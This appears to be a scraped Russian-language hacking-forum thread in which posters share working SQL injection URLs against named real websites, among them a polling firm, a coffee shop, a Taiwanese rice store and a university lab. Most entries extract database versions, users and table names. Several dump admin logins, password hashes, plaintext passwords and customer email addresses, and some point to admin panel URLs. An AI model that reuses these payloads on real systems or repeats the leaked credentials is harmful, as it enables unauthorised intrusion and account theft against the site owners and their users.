mssql-inj version Code: http://www.harrisinteractive.com/harris_poll/index.asp?PID=792+or+1=@@version-- db_name Code: http://www.harrisinteractive.com/harris_poll/index.asp?PID=792+or+1=(select+db_name())-- system_user Code: http://www.harrisinteractive.com/harris_poll/index.asp?PID=792+or+1=(select+system_user)-- tables Code: http://www.harrisinteractive.com/harris_poll/index.asp?PID=792+or+1=(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in+('Poll','AdminVerify','dtproperties','sysconstraints','syssegments'))-- columns of table AdminVerify Code: http://www.harrisinteractive.com/harris_poll/index.asp?PID=792+or+1=(select+top+1+column_name+from++information_schema.columns+where+table_name='AdminVerify'+and+column_name+not+in+('AdminName','AdminPassword'))-- Data acquisition Code: http://www.harrisinteractive.com/harris_poll/index.asp?PID=792+or+1=(select+top+1+cast(AdminName+as+nvarchar)%2B%27%3A%27%2Bcast(AdminPassword+as+nvarchar)+from+AdminVerify)--
ПР5 http://cala.arizona.edu/events/eventdetails.php?id=-66+union+select+1,2,3,table_name,5,6,7,8,9,10+from+information_schema.tables+limit+25,100/* таблицы: password users пассы: structure foundation [email protected] utrecht aquafina raspberry satellite
Code: http://www.cherkov.org.ua/dis.php?nid=-5+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4# 5.0.41-community:f4ltdcom_cherkov:f4ltdcom_vadim@localhost tables: Code: CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET_APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,KEY_COLUMN_USAGE,PROFILING,ROUTINES,SCHEMATA,SCHEMA_PRIVILEGES,STATISTICS,TABLES,TABLE_CONSTRAINTS,TABLE_PRIVILEGES,TRIGGERS,USER_PRIVILEGES,VIEWS,test_anti,test_boxing,test_duel,test_enews,test_fightart,test_ganswer,test_guest,test_guns,test_health,t _______________________ Code: http://kolesaonline.ru/diski_view.php?code=-20210054+union+select+1,2,3,4,5,6,7,8,9,10,concat_ws(0x3a,version(),database(),user()),12-- 4.1.22-log:kolesa:kolesa-sql@localhost _______________________ Code: http://www.crmru.info/library_article_view.php?article_id=7+union+select+1,2,3,4,5,6,concat_ws(0x3a,version(),database(),user()),8,9,10,11-- 4.0.27-log:micro:[email protected]
www.cosmicscoffee.com Code: http://www.cosmicscoffee.com/shops.php?cid=-611+union+select+1,2,3,concat_ws(0x3a,version(),user(),database()) Версия - 5.0.45: Юзер - cosmicscof@localhost: БД - cosmicscoffee Табличка administrators Code: http://www.cosmicscoffee.com/shops.php?cid=-611+union+select+1,2,3,concat_ws(0x3b,user_name,user_password)+from+administrators Code: kitchen;ac3a02e36381e883d05901ab270d6e80:63
Database Version: 4.1.22-standard-log Database name: fabernet_fabernet User name: fabernet_faber@localhost Админка: http://fabernet.com.ua/admin Database Version: 5.0.67 Database name: silouette User name: silouette@localhost price_comments Админка: http://silouette.com.ua/admin Database Version: 5.0.67 Database name: lastivka User name: lastivka@localhost Админка: http://plastivka.com.ua/admin Database Version: 5.0.67 Database name: expertise User name: expertise@localhost Админка: http://expertise.in.ua/admin
Raiffeisen ASSET MANAGEMENT (Bulgaria) 5ая ветка user() = root@localhost Головной центр предлицензионной подготовки Code: gcpp_cert:gcpp_gcpp@localhost:4.1.22-standard Code: adm:tbontbtitq oper:yrepa00 user:yyy123
Target: www.omwy.cc Evil link: http://www.omwy.cc/en/news.php?id=-3+union+select+1,2,3,4,concat_ws(0x3a,version(),user(),database()),6 Info: Version: 4.1.12 User: oumeiceramic_f@localhost Database: oumeiceramic
SQL - Code: http://www.nadona.org/calendar.php?id=-22+union+select+1,CONCAT_WS(CHAR(32,58,32),user(),database(),%20version()),3,4,5,6,7,8-- nadona_sql@localhost : nadona_admin : 5.0.27-standard Поскольку версия больше 5 узнаем таблицы.... Code: http://www.nadona.org/calendar.php?id=-22+union+select+1,CONCAT_WS(CHAR(32,58,32),user(),database(),%20version()),GROUP_CONCAT(0x3a,0x3a,table_name),4,5,6,7,8+from+information_schema.tables--
Какойто китайский шоп... taiwanrice.com Code: http://taiwanrice.com/upload/user.php?act=order_query&order_sn=%27%20union%20select%201,2,3,4,5,6,concat_ws(0x3a,user(),database(),version()),8/* tinwhang@localhost:ecshop:5.0.45 Code: http://taiwanrice.com/upload/user.php?act=order_query&order_sn=%27%20union%20select%201,2,3,4,5,6,table_name,8%20from%20information_schema.tables+limit+1,1/* 44 таблицы Code: http://taiwanrice.com/upload/user.php?act=order_query&order_sn=%27%20union%20select%201,2,3,4,5,6,concat_ws(0x3a,user_name,password),8%20from%20ecs_users/* юзвери: Code: email,login,hash,password [email protected],6hth,924c38132b75ff3dccb94114f5326e8 [email protected],lny2307,ef3592f32a1c28b572c2014ffb0910b0:655411 [email protected],wendy, 0e0a6a1e3566821e6117746aa2a2ff72 [email protected], 陳妍如, 576966f758ceee75f38271489ef7e839:841009 [email protected],jean5202000, 26be9bb4e49df2e9742056e54db12789 ecs_admin_user Code: 'tinwhang', '[email protected]', 'f50ea380584f8fa388cf45bc5366f3fa:inmine00' PR:0 тиц:0
Code: http://www.dreambabys.nl/reborn-baby.php?id=-35+union+select+1,2,3,0x7265616c20706f63616e69,5,6,7,8,9,10,11,12,13-- 5.0.51a-community
скуль: Code: http://www.amerimar.com/team.php?id=-10+union+select+1,2,3,4,5,6-- версия: Code: http://www.amerimar.com/team.php?id=-10+union+select+1,version(),3,4,5,6-- 5.0.67 инфа: Code: http://www.amerimar.com/team.php?id=-10+union+select+1,concat_ws(0x3a,user()),3,4,5,6-- [email protected] таблицы выводятся лимитом. Code: http://www.amerimar.com/team.php?id=-10+union+select+1,table_name,3,4,5,6+from+information_schema.tables--
http://www.nano.gatech.edu/news/release.php?id=-2540+union+select+1,2,3,4,table_name,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96+from+information_schema.tables+limit+282,1000-- Tables: user_roles user_profiles user_logins b.gonzalez:a9fbdd1e49f69d2e46c3f9baf93d092b:0 j.swaby:edff5064c3f51437182395bf4f77f0b3:js333
скуль: Code: http://www.zimsculpt.com/artist.php?id=-10+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20-- версия: Code: http://www.zimsculpt.com/artist.php?id=-10+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20-- 4.1.20 =( info: Code: http://www.zimsculpt.com/artist.php?id=-10+union+select+1,concat_ws(0x3a,user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20-- user() z887hhH1q@localhost database() zimsculpt
<<Ролевая игра "На той Гражданской">> Code: http://cwar.holdgold.ru/page.php?id=143+union+select+1,2,concat_ws(0x3a,version(),database(),user(),@version_compile_os),4,5--+ 5.0.67-log:u9753_holdgold:[email protected]
скуль: Code: http://www.propville.com/viewPress.php?id=-10+union+select+1,2,3,4-- версия: Code: http://www.propville.com/viewPress.php?id=-10+union+select+1,2,version(),4-- 4.1.20 блин <5 =) info: Code: http://www.propville.com/viewPress.php?id=-10+union+select+1,2,concat_ws(0x3a,user(),database()),4-- user() [email protected] database() propville
Code: http://www.sorbents.ru/products/product.php?id=-985+union+select+concat_ws(0x3a,version(),database(),user()),2,3-- 5.0.45-log:usorbents14:usorbents14@localhost Code: http://www.sorbents.ru/products/product.php?id=-985+union+select+group_concat(table_name),2,3+from+information_schema.tables Code: http://aap.usluga21.ru/product.php?id=-19+union+select+1,2,unhex(hex(concat_ws(0x3a,version(),database(),user()))),4,5,6,7,8,9,10,11,12,13,14,15-- 4.1.18-standard:db_usluga215:[email protected] // антибоян не работает
http://www.metalsrepublic.ie/temp.php?id=1&image=-6+union+select+1,concat_ws(0x3a,version(),database(), user()),3,4-- 5.0.51a-log:370900_metals:[email protected] PR: 4
скуль: Code: http://www.fullframefest.org/more_film_info.php?id=-30+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19-- версия: Code: http://www.fullframefest.org/more_film_info.php?id=-30+union+select+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19-- 5.0.67 таблицы выводятся limit'om Code: http://www.fullframefest.org/more_film_info.php?id=-30+union+select+1,2,table_name,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+information_schema.tables-- info: Code: http://www.fullframefest.org/more_film_info.php?id=-30+union+select+1,2,concat_ws(0x3a,user(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19-- user() fullfram_admin@localhost database() fullfram_films
